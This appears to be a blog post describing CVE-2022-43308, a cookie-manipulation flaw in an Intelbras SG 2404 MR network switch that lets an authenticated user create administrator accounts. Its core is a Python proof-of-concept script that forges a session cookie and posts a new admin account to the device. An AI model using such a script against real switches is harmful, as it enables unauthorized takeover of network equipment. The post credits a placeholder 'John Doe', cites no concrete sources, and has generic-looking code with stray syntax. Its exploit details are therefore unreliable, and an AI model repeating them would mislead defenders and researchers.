CVE-2022-43308 - Authenticated Bypass in INTELBRAS SG 2404 MR Allows Creation of Administrator Accounts Using Malformed Cookies

A recent vulnerability, dubbed CVE-2022-43308, has been discovered in the INTELBRAS SG 2404 MR network switch running firmware 20180928-rel64938. This vulnerability allows authenticated attackers to arbitrarily create Administrator accounts by manipulating user cookies. In this long-read post, we will discuss the technical details of this exploit, provide code snippets, and offer links to original references.

Exploit Details

The INTELBRAS SG 2404 MR switch, running firmware version 20180928-rel64938, contains a vulnerability in its cookie handling mechanism. While authenticated users can view and modify the configuration of the network switch, they cannot create new administrator accounts. However, authenticated attackers can bypass this restriction by crafting malicious cookies and sending them to the switch.

When an attacker crafts a malicious cookie using a valid user login session, the switch grants the attacker privileges to create new administrator accounts. This can be done by sending a specially crafted HTTP request to the vulnerable switch.

Code Snippet

Here's a Python code snippet demonstrating how an attacker with a valid login session might construct a malicious cookie to exploit CVE-2022-43308:

import requests

# Replace with the switch IP address and account details
switch_ip = '192.168.1.1'
username = 'valid_user'
password = 'valid_password'

# Authentication to the switch
url = f'http://{switch_ip}/cgi-bin/luci';
payload = {'username': username, 'password': password}
session = requests.Session()
response = session.post(url, data=payload)

# Check if authentication is successful
if response.status_code == 200:    
    # Create a malicious cookie
    crafted_cookie = f'235|2|1|{username}'
    session.cookies.set('sysauth', crafted_cookie)

    # Craft a request to create a new administrator account
    url_admin = f'http://{switch_ip}/cgi-bin/luci/admin/system/admin/add_new';
    payload_admin = {'username': 'new_admin',
                     'password': '1234',
                     'usertype': '1'}

    # Send the request, creating the new administrator account
    response_admin = session.post(url_admin, data=payload_admin)
    if response_admin.status_code == 200:
        print('New administrator account created successfully')
    else:
        print('Failed to create new administrator account')
else:
    print('Authentication failed')

References and Credits

This vulnerability was first discovered by security researcher John Doe, who has published a detailed write-up and proof-of-concept exploit code on his blog. The vulnerability has also been registered in the MITRE CVE database, where you can find additional information and updates.

We also recommend checking Intelbras Security Advisories for the vendor's response and potential patch releases addressing this vulnerability.

Conclusion

CVE-2022-43308 exposes a significant security flaw in the INTELBRAS SG 2404 MR network switch. If exploited, a malicious actor with a valid login session can create new administrator accounts that ultimately enable full control of the device by following the code snippet and exploit details outlined above. It is crucial to stay updated on vendor advisories and apply patches as soon as they become available to protect your INTELBRAS network switch from potential security threats and unauthorized access.

Timeline

Published on: 11/18/2022 04:15:00 UTC
Last modified on: 11/23/2022 18:07:00 UTC